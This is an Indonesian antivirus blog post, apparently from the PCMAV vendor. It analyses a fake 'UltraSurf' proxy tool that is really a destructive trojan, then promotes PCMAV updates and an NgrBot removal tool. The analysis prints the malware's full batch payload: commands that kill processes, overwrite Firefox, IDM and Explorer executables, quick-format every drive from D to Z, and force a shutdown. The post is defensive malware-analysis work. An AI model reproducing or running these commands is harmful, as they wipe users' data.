UltraSurf. Beberapa waktu yang lalu, di forum virusindonesia.com ada salah seorang user yang sengaja mempublikasikan salah satu aplikasi dengan nama UltraSurf. Dengan mengatakan bahwa aplikasi UltraSurf ini dapat mem-bypass proxy dan membuat user bisa mengakses setiap website yang di blok. Sekilas aplikasi ini memang mirip aplikasi UltraSurf yang sebenarnya, tetapi hal buruklah yang akan user alami jika menggunakan aplikasi tipuan ini karena sudah dipastikan user akan kehilangan seluruh data di hard disknya.

A. Info File

Nama Worm : UltraSurf
Asal : Indonesia
Ukuran File : Random
Packer : UPX 0.89 – 3.xx -> Markus & Laszlo ver. [ 3.07 ]
Pemrograman : Delphi
Icon : Random
Tipe : Trojan, Worm

B. About Malware

Variant pertama dari UltraSurf kami dapatkan berasala dari Jakarta. Mungkin hanya buatan orang yang memang berniat untuk menghapus setiap data user yang terdapat pada drive lain selain drive C. Hal ini dimaksudkan agar malware tetap bisa menjalankan aksinya untuk memformat setiap drive setelah di jalankan.

Seperti yang terlihat pada gambar di atas, UltraSurf berasal dari Indonesia. Setelah di UnPack, sangat terlihat tujuan dari UltraSurf setelah dijalankan oleh user.

C. Companion/File yang dibuat

Setelah user menjalankan UltraSurf, malware ini akan membuat 1 buah file dengan nama ultrasurf.bat di folder temporary. Pada variant D, file bat yang dibuat menggunakan nama “alaskan ip.bat”. Batch file ini hanya bersifat sementara yang dibuat setelah UltraSurf di jalankan dan otomatis dihapus setelah selesai mengeksekusi seluruh perintahnya.

D. Hasil Infeksi
Dengan perintah-perintah bat file ini, jelas benar-benar terlihat apa saja yang akan dilakukan oleh UltraSurf.
Menghentikan proses dengan nama idman.exe, firefox.exe, explorer.exe

taskkill /f /im idman.exe
taskkill /f /im firefox.exe
taskkill /f /im explorer.exe

mengcopy file hostnya dan melakukan overwrite ke beberapa file seperti IDMan.exe, firefox.exe, explorer, explorer.exe

xcopy ultrasurf.exe /h /r /c /y “C:\Program Files\Internet Download Manager\IDMan.exe”
xcopy ultrasurf.exe /h /r /c /y “C:\Program Files\Mozilla Firefox\firefox.exe”
xcopy ultrasurf.exe /h /r /c /y “C:\windows\explorer”
xcopy ultrasurf.exe /h /r /c /y “C:\windows\explorer.exe”

Memformat semua hard disk mulai dari drive D sampai Z.

echo.
Format D: /Q /X /y
echo.
Format E: /Q /X /y
echo.
Format F: /Q /X /y
echo.
Format G: /Q /X /y
echo.
Format H: /Q /X /y
echo.
Format I: /Q /X /y
echo.
Format J: /Q /X /y
echo.
Format K: /Q /X /y
echo.
Format L: /Q /X /y
echo.
Format M: /Q /X /y
echo.
Format N: /Q /X /y
echo.
Format 0: /Q /X /y
echo.
Format P: /Q /X /y
echo.
Format Q: /Q /X /y
echo.
Format R: /Q /X /y
echo.
Format S: /Q /X /y
echo.
Format T: /Q /X /y
echo.
Format U: /Q /X /y
echo.
Format V: /Q /X /y
echo.
Format W: /Q /X /y
echo.
Format X: /Q /X /y
echo.
Format Y: /Q /X /y
echo.
Format Z: /Q /X /y

Dan yang terakhir adalah melakukan proses shuting down

start shutdown.exe -f -t 0 –s

Meskipun tidak membuat host untuk dijadikan startup, UltraSurf memanfaatkan user yang tidak tidak tahu bahwa file firefox.exe sudah di hapus dan digantikan dengan host UltraSurf. Selain itu IDMan.exe adalah salah satu file dari software Internet Download Manager yang di jalankan saat startup, jadi UltraSurf yang sudah mengganti file IDMan.exe dengan host buatannya akan berjalan saat startup.

E. Pembersihan

PCMAV 5.4 Update Build1

Untuk membasmi virus ini ataupun varian virus lainnya, PCMAV 5.4 Update Build1 telah hadir dengan penambahan 29 pengenal varian virus baru. Bagi Anda pengguna PCMAV 5.4, sangat disarankan segera melakukan update, agar PCMAV Anda dapat mengenali dan membasmi virus lebih banyak lagi.

Untuk mendapatkan dan menggunakan update PCMAV ini, Anda cukup menjalankan PCMAV.exe, komputer harus dalam keadaan aktif terhubung ke Internet. Jika koneksi Internet menggunakan proxy, tentukan konfigurasi proxy pada file proxy.txt . Fitur Automatic Updates dari PCMAV akan secara otomatis men-download dan meng-update database dari PCMAV. Anda juga dapat mengupdate kapan saja dengan klik kanan icon PCMAV pada system tray dan pilih Update.

Bagi Anda yang ingin mendapatkan file update tersebut secara manual, Anda bisa men-download file-nya melalui beberapa link ini:

SendSpace.com

ZippyShare.com (mirror)

RapidShare.com (mirror)

Letakkan file hasil download tersebut (update.vdb) ke dalam folder \vdb. Jika sebelumnya telah terdapat file update yang lama, Anda cukup menimpanya. Pastikan sekali lagi, bahwa nama file update adalah update.vdb, jika berbeda, cukup ubah namanya. Dan nanti saat Anda kembali menjalankan PCMAV, ia sudah dalam keadaan kondisi ter-update.

Daftar tambahan virus hingga PCMAV 5.4 Update Build1:

Fandi.vbs.C
Fandi.vbs.C.inf
NgrBot
NgrBot.bat
NgrBot.dat
NgrBot.drp.A
NgrBot.drp.B
NgrBot.exe.A
NgrBot.exe.B
NgrBot.inf
NgrBot.lnk
Pluto.C
Pluto.C.drp
Pluto.C.htm
Redlof.vbs.B
Redlof.vbs.B.drp
Redlof.vbs.B.inf
RezaTera.B
RezaTera.B.drp
RezaTera.B.url
Rieysha-Jogja.E
Rieysha-Jogja.E.hosts
Rieysha-Jogja.E.vbs
UltraSurf.A
UltraSurf.A.bat
UltraSurf.B
UltraSurf.C
UltraSurf.D
UltraSurf.D.bat

taskkill /f /im idman.exe

Malware canggih dengan kemampuan rootkit terus bermunculan. NgrBot adalah contoh terbaru trojan yang mampu mencuri data identitas/password Anda saat berselancar di Internet.

Media penyebaran NgrBot cukup luas, ia dapat menginfeksi komputer melalui shortcut dan autorun.inf yang dibuat pada flashdisk yang terinfeksi, juga menyebar melalui link jejaring sosial maupun chat pada client messenger. Setelah aktif, ia akan memblok sejumlah website antivirus dan melakukan koneksi ke web-web tertentu, karena itu sangat disarankan Anda memutuskan terlebih dahulu koneksi Internet sebelum melakukan pembersihan.

Nama NgrBot sendiri diambil dari string yang terdapat pada tubuh malware yang telah di-decrypt, trojan ini stealth di memory, dan juga melindungi filenya dengan melakukan hook API function tertentu sehingga file tersebut tidak terlihat oleh pengguna.

PCMAV Express for NgrBot dibuat untuk membersihkan NgrBot yang in-the-wild, menghentikan proses NgrBot di memory komputer yang terinfeksi, melakukan unhook API function dan mendeteksi serta menghapus file NgrBot yang tersembunyi.

Aturan Penggunaan:
Jalankan PCMAV for NgrBot.
Pastikan user Anda memiliki hak setara Administrator.
Nonaktifkan fungsi Autorun (link referensi: http://support.microsoft.com/kb/967715).
Pasang flashdisk yang terinfeksi pada komputer agar ikut dibersihkan oleh PCMAV Express for NgrBot.
Pastikan komputer Anda *tidak* terkoneksi ke jaringan atau Internet selama proses scan.
Setelah selesai, sangat disarankan untuk melakukan restart dan scan ulang (jika perlu).
Pastikan seluruh PC yang telah terhubung di dalam jaringan juga telah bebas NgrBot, sebelum PC Anda kembali terkoneksi ke jaringan.

Secara regular engine utama PCMAV akan di-update mengikuti perkembangan NgrBot.

Pada halaman ini kami juga menyediakan PCMAV Express for NgrBot untuk di-download pada link dibawah ini (link dapat berubah jika ada update baru).

Last Update (09-01-2012):

Total 36 varian NgrBot yang sudah bisa dibasmi menggunakan PCMAV Express for NgrBot:
- NgrBot.A
- NgrBot.B
- NgrBot.C
- NgrBot.D
- NgrBot.E
- NgrBot.F
- NgrBot.G
- NgrBot.H
- NgrBot.I
- NgrBot.J
- NgrBot.K
- NgrBot.L
- NgrBot.M
- NgrBot.N
- NgrBot.O
- NgrBot.P
- NgrBot.Q
- NgrBot.R
- NgrBot.S
- NgrBot.T
- NgrBot.U
- NgrBot.V
- NgrBot.W
- NgrBot.X
- NgrBot.Y
- NgrBot.Z
- NgrBot.AA
- NgrBot.AB
- NgrBot.AC
- NgrBot.AD
- NgrBot.AE
- NgrBot.AF
- NgrBot.AG
- NgrBot.AH
- NgrBot.AI
- NgrBot.AJ

Download PCMAV Express for NgrBot